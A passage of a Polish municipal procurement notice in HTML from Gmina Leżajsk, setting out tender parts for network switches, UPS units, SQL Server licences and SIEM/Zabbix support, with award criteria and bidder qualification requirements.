kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, wdrożenie oraz utrzymanie zintegrowanego systemu zapewniającego bezpieczeństwo informacji dla Gminy Leżajsk. Zakres zamówienia obejmuje dostawę infrastruktury sprzętowej, rozwiązań informatycznych oraz usługi instalacji, konfiguracji, wsparcia i doradztwa eksperckiego na etapie realizacji zamówienia.<br/>Szczegółowe określenie opisu przedmiotu zamówienia zostało przedstawione w załączniku nr 3 do niniejszej SWZ, w którym zawarto opisy przedmiotu zamówienia dla każdego z zadań. <br/>Zadanie nr 3 – Zakup przełączników zarządzalnych<br/>Zadanie obejmuje dostawę 6 zarządzalnych przełączników wyposażonych w 48 portów 1GbE RJ-45 oraz 4 porty 10GbE SFP+, przeznaczonych do rozbudowy infrastruktury dostępowej z integracją z systemem Fortigate. Przełączniki muszą wspierać centralne zarządzanie, uwierzytelnianie 802.1x, VLAN-y, port mirroring, protokół sFlow oraz funkcje klasy NAC i firewall, zapewniając wysoką wydajność i bezpieczeństwo sieci.<br/><br/><br/>	Zamawiający dopuszcza stosowanie materiałów równoważnych. <br/>	Jeżeli w jakimkolwiek miejscu w dokumentacji zostały wskazane nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenie materiałów czy urządzeń służących do wykonania niniejszego zamówienia - wszędzie tam Zamawiający dodaje wyrazy &#34;lub równoważne&#34; i wszędzie tam Zamawiający dopuszcza stosowanie równoważnych nazw producenta, nazw własnych, znaków towarowych, patentów lub pochodzenia materiałów czy urządzeń służących do wykonania niniejszego zamówienia.<br/>	Jeżeli w jakimkolwiek miejscu w dokumentacji znajdują się odniesienia do norm europejskich, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, wszędzie tam zamawiający dodaje do tych nazw wyrazy &#34;lub równoważne&#34; i wszędzie tam Zamawiający dopuszcza stosowanie równoważnych norm, ocen technicznych, aprobat, specyfikacji technicznych<br/>i systemów referencji technicznych.	<br/>Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych materiałów lub urządzeń. Zamawiający zastrzega sobie także prawo do korzystania w tym względzie z opinii ekspertów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32420000-3 - Urządzenia sieciowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) cena (waga 60%) - P1<br/>Kryterium – „cena” – poszczególnym ofertom zostaną przyznane punkty za cenę w skali 1-60 obliczone według wzoru wskazanego w<br/>rozdz. XXI SWZ<br/>2) Termin realizacji – P4	<br/><br/>Kryterium: Termin realizacji <br/>Waga 20% (20 punktów): <br/>a)	Za zaproponowanie terminu realizacji zamówienia w przedziale między 60 a 40 dni, Wykonawca otrzyma 10 pkt.<br/>b)	Za zaproponowanie terminu realizacji zamówienia poniżej 40 dni, Wykonawca otrzyma 20 pkt.<br/>Przez termin realizacji zamówienia należy rozumieć termin wykonania całego zamówienia. Bieg terminu rozpoczyna się na dzień następujący po dniu zawarcia umowy.<br/>Zaoferowany termin realizacji zamówienia nie może być dłuższy niż 60 dni kalendarzowych. W przypadku zaoferowania terminu dłuższego niż 60 dni oferta Wykonawcy zostanie odrzucona!<br/>Termin realizacji należy podać w pełnych dniach!<br/><br/>3) Kryterium: Rozszerzona pojemność tablicy MAC.<br/>Waga: 20% (20 punktów)<br/>Kryterium oceniane będzie na podstawie łącznej pojemności tablicy MAC oferowanych przełączników. Minimalny wymóg OPZ to 32 000 wpisów – za jego spełnienie nie przyznaje się punktów.<br/>Zadeklarowana pojemność tablicy MAC	Liczba przyznanych punktów <br/>Za zadeklarowanie 32 000 wpisów 0 pkt<br/>Za zadeklarowanie min. 50 000 wpisów	10 pkt<br/>Za zadeklarowanie min. 100 000 wpisów 20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rozszerzona pojemność tablicy MAC.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, wdrożenie oraz utrzymanie zintegrowanego systemu zapewniającego bezpieczeństwo informacji dla Gminy Leżajsk. Zakres zamówienia obejmuje dostawę infrastruktury sprzętowej, rozwiązań informatycznych oraz usługi instalacji, konfiguracji, wsparcia i doradztwa eksperckiego na etapie realizacji zamówienia.<br/>Szczegółowe określenie opisu przedmiotu zamówienia zostało przedstawione w załączniku nr 3 do niniejszej SWZ, w którym zawarto opisy przedmiotu zamówienia dla każdego z zadań. <br/>Zadanie nr 4 – Zakup zasilaczy awaryjnych<br/>Zadanie obejmuje dostawę dwóch zasilaczy awaryjnych UPS o mocy min 3000W każdy, zapewniających podtrzymanie zasilania przez co najmniej 70 minut przy pełnym obciążeniu (z modułami bateryjnymi). UPS-y muszą oferować zarządzanie SNMP, system ładowania, monitoring zużycia energii oraz certyfikaty cyberbezpieczeństwa (UL 2900-1, IEC 62443-4-2), gwarantując niezawodność i bezpieczeństwo zasilania infrastruktury krytycznej.<br/><br/><br/>	Zamawiający dopuszcza stosowanie materiałów równoważnych. <br/>	Jeżeli w jakimkolwiek miejscu w dokumentacji zostały wskazane nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenie materiałów czy urządzeń służących do wykonania niniejszego zamówienia - wszędzie tam Zamawiający dodaje wyrazy &#34;lub równoważne&#34; i wszędzie tam Zamawiający dopuszcza stosowanie równoważnych nazw producenta, nazw własnych, znaków towarowych, patentów lub pochodzenia materiałów czy urządzeń służących do wykonania niniejszego zamówienia.<br/>	Jeżeli w jakimkolwiek miejscu w dokumentacji znajdują się odniesienia do norm europejskich, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, wszędzie tam zamawiający dodaje do tych nazw wyrazy &#34;lub równoważne&#34; i wszędzie tam Zamawiający dopuszcza stosowanie równoważnych norm, ocen technicznych, aprobat, specyfikacji technicznych<br/>i systemów referencji technicznych.	<br/>Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych materiałów lub urządzeń. Zamawiający zastrzega sobie także prawo do korzystania w tym względzie z opinii ekspertów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30237280-5 - Akcesoria zasilające</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) cena (waga 60%) - P1<br/>Kryterium – „cena” – poszczególnym ofertom zostaną przyznane punkty za cenę w skali 1-60 obliczone według wzoru wskazanego w<br/>rozdz. XXI SWZ<br/>2) Termin realizacji – P4	<br/><br/>Kryterium: Termin realizacji <br/>Waga 20% (20 punktów): <br/>a)	Za zaproponowanie terminu realizacji zamówienia w przedziale między 60 a 40 dni, Wykonawca otrzyma 10 pkt.<br/>b)	Za zaproponowanie terminu realizacji zamówienia poniżej 40 dni, Wykonawca otrzyma 20 pkt.<br/>Przez termin realizacji zamówienia należy rozumieć termin wykonania całego zamówienia. Bieg terminu rozpoczyna się na dzień następujący po dniu zawarcia umowy.<br/>Zaoferowany termin realizacji zamówienia nie może być dłuższy niż 60 dni kalendarzowych. W przypadku zaoferowania terminu dłuższego niż 60 dni oferta Wykonawcy zostanie odrzucona!<br/>Termin realizacji należy podać w pełnych dniach!<br/><br/>3)	Kryterium: Możliwość wydłużenia czasu podtrzymania poprzez dodatkowe moduły bateryjne<br/>Waga: 20% (20 punktów)<br/>Kryterium dotyczy zdolności oferowanego urządzenia do rozbudowy o dodatkowe moduły bateryjne, przekraczającej minimalne wymagania określone w OPZ.<br/>Deklarowana liczba możliwych do podłączenia modułów bateryjnych	Liczba przyznanych punktów <br/>4 moduły	0 pkt<br/>6 modułów	10	pkt<br/>7 lub więcej	20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Możliwość wydłużenia czasu podtrzymania poprzez dodatkowe moduły bateryjne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, wdrożenie oraz utrzymanie zintegrowanego systemu zapewniającego bezpieczeństwo informacji dla Gminy Leżajsk. Zakres zamówienia obejmuje dostawę infrastruktury sprzętowej, rozwiązań informatycznych oraz usługi instalacji, konfiguracji, wsparcia i doradztwa eksperckiego na etapie realizacji zamówienia.<br/>Szczegółowe określenie opisu przedmiotu zamówienia zostało przedstawione w załączniku nr 3 do niniejszej SWZ, w którym zawarto opisy przedmiotu zamówienia dla każdego z zadań. <br/>Zadanie nr 5 – Zakup oprogramowania SQL Server<br/>Zadanie obejmuje dostawę jednej licencji standardowej relacyjnego systemu zarządzania bazą danych (co najmniej SQL Server 2022 lub równoważny) wraz z 70 wieczystymi licencjami dostępowymi typu User CAL. Licencje mają umożliwiać pełne wykorzystanie funkcji bazy danych, w tym zapytań, raportowania, automatyzacji oraz zarządzania, z prawem do aktualizacji zabezpieczeń przez minimum 12 miesięcy.<br/><br/><br/>	Zamawiający dopuszcza stosowanie materiałów równoważnych. <br/>	Jeżeli w jakimkolwiek miejscu w dokumentacji zostały wskazane nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenie materiałów czy urządzeń służących do wykonania niniejszego zamówienia - wszędzie tam Zamawiający dodaje wyrazy &#34;lub równoważne&#34; i wszędzie tam Zamawiający dopuszcza stosowanie równoważnych nazw producenta, nazw własnych, znaków towarowych, patentów lub pochodzenia materiałów czy urządzeń służących do wykonania niniejszego zamówienia.<br/>	Jeżeli w jakimkolwiek miejscu w dokumentacji znajdują się odniesienia do norm europejskich, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, wszędzie tam zamawiający dodaje do tych nazw wyrazy &#34;lub równoważne&#34; i wszędzie tam Zamawiający dopuszcza stosowanie równoważnych norm, ocen technicznych, aprobat, specyfikacji technicznych<br/>i systemów referencji technicznych.	<br/>Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych materiałów lub urządzeń. Zamawiający zastrzega sobie także prawo do korzystania w tym względzie z opinii ekspertów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48000000-8 - Pakiety oprogramowania i systemy informatyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) cena (waga 60%) - P1<br/>Kryterium – „cena” – poszczególnym ofertom zostaną przyznane punkty za cenę w skali 1-60 obliczone według wzoru wskazanego w<br/>rozdz. XXI SWZ<br/>2) Termin realizacji – P4	<br/><br/>Kryterium: Termin realizacji <br/>Waga 20% (20 punktów): <br/>a)	Za zaproponowanie terminu realizacji zamówienia w przedziale między 60 a 40 dni, Wykonawca otrzyma 10 pkt.<br/>b)	Za zaproponowanie terminu realizacji zamówienia poniżej 40 dni, Wykonawca otrzyma 20 pkt.<br/>Przez termin realizacji zamówienia należy rozumieć termin wykonania całego zamówienia. Bieg terminu rozpoczyna się na dzień następujący po dniu zawarcia umowy.<br/>Zaoferowany termin realizacji zamówienia nie może być dłuższy niż 60 dni kalendarzowych. W przypadku zaoferowania terminu dłuższego niż 60 dni oferta Wykonawcy zostanie odrzucona!<br/>Termin realizacji należy podać w pełnych dniach!<br/><br/>3) Kryterium: Dodatkowe licencje dostępowe CAL<br/>Waga: 20 punktów<br/>Kryterium dotyczy liczby oferowanych licencji CAL (User CAL) przekraczającej wymagane minimum – 70 sztuk.<br/><br/>Dodatkowe licencje dostępowe CAL	Liczba przyznanych punktów <br/>70 CAL	0 pkt<br/>71–74 CAL	10 pkt<br/>Pow. 74 CAL	20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe licencje dostępowe CAL</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, wdrożenie oraz utrzymanie zintegrowanego systemu zapewniającego bezpieczeństwo informacji dla Gminy Leżajsk. Zakres zamówienia obejmuje dostawę infrastruktury sprzętowej, rozwiązań informatycznych oraz usługi instalacji, konfiguracji, wsparcia i doradztwa eksperckiego na etapie realizacji zamówienia.<br/>Szczegółowe określenie opisu przedmiotu zamówienia zostało przedstawione w załączniku nr 3 do niniejszej SWZ, w którym zawarto opisy przedmiotu zamówienia dla każdego z zadań. <br/>Zadanie nr 6 – Wsparcie techniczne wdrożenia aplikacji typu SIEM<br/>Zadanie obejmuje świadczenie zdalnego wsparcia technicznego dla systemu klasy SIEM oraz systemu monitorowania infrastruktury IT, w zakresie ich instalacji, konfiguracji, integracji, testowania i utrzymania. Usługa realizowana będzie przez wykwalifikowany personel Wykonawcy, obejmując również doradztwo, diagnostykę, aktualizacje oraz dokumentację techniczną, z zapewnieniem bezpieczeństwa danych i bieżącej współpracy z Zamawiającym.<br/><br/><br/>	Zamawiający dopuszcza stosowanie materiałów równoważnych. <br/>	Jeżeli w jakimkolwiek miejscu w dokumentacji zostały wskazane nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenie materiałów czy urządzeń służących do wykonania niniejszego zamówienia - wszędzie tam Zamawiający dodaje wyrazy &#34;lub równoważne&#34; i wszędzie tam Zamawiający dopuszcza stosowanie równoważnych nazw producenta, nazw własnych, znaków towarowych, patentów lub pochodzenia materiałów czy urządzeń służących do wykonania niniejszego zamówienia.<br/>	Jeżeli w jakimkolwiek miejscu w dokumentacji znajdują się odniesienia do norm europejskich, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, wszędzie tam zamawiający dodaje do tych nazw wyrazy &#34;lub równoważne&#34; i wszędzie tam Zamawiający dopuszcza stosowanie równoważnych norm, ocen technicznych, aprobat, specyfikacji technicznych<br/>i systemów referencji technicznych.	<br/>Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych materiałów lub urządzeń. Zamawiający zastrzega sobie także prawo do korzystania w tym względzie z opinii ekspertów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">51611100-9 - Usługi instalowania urządzeń komputerowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72250000-2 - Usługi w zakresie konserwacji i wsparcia systemów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) cena (waga 60%) - P1<br/>Kryterium – „cena” – poszczególnym ofertom zostaną przyznane punkty za cenę w skali 1-60 obliczone według wzoru wskazanego w<br/>rozdz. XXI SWZ<br/><br/>2) Liczba osób skierowanych do świadczenia wsparcia technicznego<br/>Waga: 40 punktów<br/>W ramach kryterium oceniana będzie liczba osób, które Wykonawca skieruje <br/>do świadczenia usługi zdalnego wsparcia technicznego w zakresie systemów bezpieczeństwa i monitorowania infrastruktury IT, wdrożonych w ramach realizacji zamówienia. Przez system należy rozumieć rozwiązania typu:<br/>– system klasy SIEM - Wazuh (do detekcji zagrożeń i korelacji zdarzeń bezpieczeństwa),<br/>– system do monitoringu infrastruktury teleinformatycznej - Zabbix (zbieranie i wizualizacja danych o stanie urządzeń i sieci).<br/>Zamawiający przyzna punkty za skierowanie osób, które posiadają doświadczenie w świadczeniu wsparcia technicznego w zakresie co najmniej jednego z wyżej wskazanych typów systemów.<br/>Liczba osób spełniających wymagania	Liczba przyznanych punktów <br/>1 osoba	0 pkt<br/>2 osoby	40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba osób skierowanych do świadczenia wsparcia technicznego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:<br/>	Warunki udziału w postępowaniu<br/>1	Zdolność do występowania w obrocie gospodarczym<br/>	Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>2	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>	Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>3	Sytuacja ekonomiczna lub finansowa <br/>	Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>4	Zdolność techniczna lub zawodowa <br/>	1.	O udzielenie zamówienia publicznego może ubiegać się wykonawca, który spełnia warunki, dotyczące zdolności technicznej lub zawodowej tj. posiada doświadczenie zawodowe rozumiane jako należyte wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej 1 zamówienie polegające na dostawie:<br/>Zadanie nr 1: <br/>min. jednej dostawy sprzętu serwerowego wraz z macierzą dyskową i przełącznikiem sieciowym o łącznej wartości nie mniejszej niż 200 000,00 zł brutto.<br/><br/>Zadanie nr 2: <br/>Min. jednej dostawy serwera NAS o wartości nie mniejszej niż 15 000,00 zł brutto.<br/>Zadanie nr 3: <br/>Min. jednej dostawy przełączników zarządzalnych (co najmniej 3 sztuk) o łącznej wartości nie mniejszej niż 20 000,00 zł brutto.<br/><br/>Zadanie nr 4: <br/>Min. jednej dostawy zasilaczy awaryjnych (UPS) o łącznej wartości nie mniejszej niż <br/>15 000,00 zł brutto.<br/>Zadanie nr 5 :<br/>min. jednej dostawy licencji oprogramowania serwerowego klasy Microsoft SQL Server (lub równoważnego systemu relacyjnych baz danych), obejmującej min 40 licencji dostępowych o łącznej wartości nie mniejszej niż 40 000,00 zł brutto.<br/>Pozostałym zakresie zamawiający nie stawia warunku.<br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów wyszczególnionych w punkcie Rozdziale VIII SWZ, na zasadzie spełnia/nie spełnia.<br/><br/>2.	O udzielenie zamówienia publicznego może ubiegać się wykonawca, który spełnia warunek, dotyczący zdolności technicznej lub zawodowej tj. jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować następującymi osobami, które będą brały udział w wykonywaniu zamówienia:<br/>co najmniej jedną (1) osobą, która będzie uczestniczyć w wykonywaniu zamówienia posiadającą co najmniej 3 letnie doświadczenie w zakresie zdalnego wsparcia technicznego lub konfiguracji i utrzymania systemu klasy SIEM.<br/>Warunek dotyczy Zadania nr 6<br/>W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ww. warunek winien spełniać co najmniej jeden z tych Wykonawców albo wszyscy Wykonawcy łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: <br/><br/>Oświadczenie o aktualności <br/>Oświadczenie Wykonawcy o aktualności informacji zawartych w Oświadczeniu o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie podstaw wykluczenia z postępowania.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (dotyczy również wspólników spółki cywilnej), oświadczenie składa każdy z wykonawców.<br/>Wzór oświadczenia stanowi Załącznik Nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: <br/><br/>Wykaz dostaw:<br/>	Wykaz dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/>Wzór wykazu dostaw stanowi Załącznik Nr 4 do SWZ. .(dot. zadań od 1 do 5)<br/><br/><br/>Wykaz osób<br/>	Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Wzór wykazu osób stanowi Załącznik Nr 8 do SWZ.<br/>Podmiotowy środek dowodowy znajdzie zastosowanie w przypadku Wykonawcy, który złożył ofertę na zadanie nr 6.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przygotowany przez Wykonawcę szczegółowy opis oferowanego przedmiotu zamówienia. Przygotowany dokument musi zawierać wszystkie informacje dot. oferowanych modeli, nazw producentów oraz innych wymogów wraz z wpisaniem wartości parametrów oferowanego urządzeń lub oprogramowania. Do przygotowanego dokumentu należy dołączyć wszystkie certyfikaty, potwierdzenia i pozostałe dokumenty (lub inne równoważne), których obowiązek wykazania został sformułowany w załączniku nr 3 do SWZ. Podany zasób informacji musi umożliwić Zamawiającemu weryfikację, czy oferowany przedmiot zamówienia spełnia/nie spełnia wymagania Zamawiającego na podstawie poszczególnych opisów przedmiotu zamówienia zawartych w załączniku nr 3 do SWZ. <br/>Dotyczy zadania od nr 1 do nr 5 <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Przygotowany przez Wykonawcę szczegółowy opis oferowanego przedmiotu zamówienia. Przygotowany dokument musi zawierać wszystkie informacje dot. oferowanych modeli, nazw producentów oraz innych wymogów wraz z wpisaniem wartości parametrów oferowanego urządzeń lub oprogramowania. Do przygotowanego dokumentu należy dołączyć wszystkie certyfikaty, potwierdzenia i pozostałe dokumenty (lub inne równoważne), których obowiązek wykazania został sformułowany w załączniku nr 3 do SWZ. Podany zasób informacji musi umożliwić Zamawiającemu weryfikację, czy oferowany przedmiot zamówienia spełnia/nie spełnia wymagania Zamawiającego na podstawie poszczególnych opisów przedmiotu zamówienia zawartych w załączniku nr 3 do SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą muszą zostać złożone:<br/>	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu z postępowania – Załącznik Nr 2 do SWZ<br/>(w przypadku wspólnego ubiegania się o 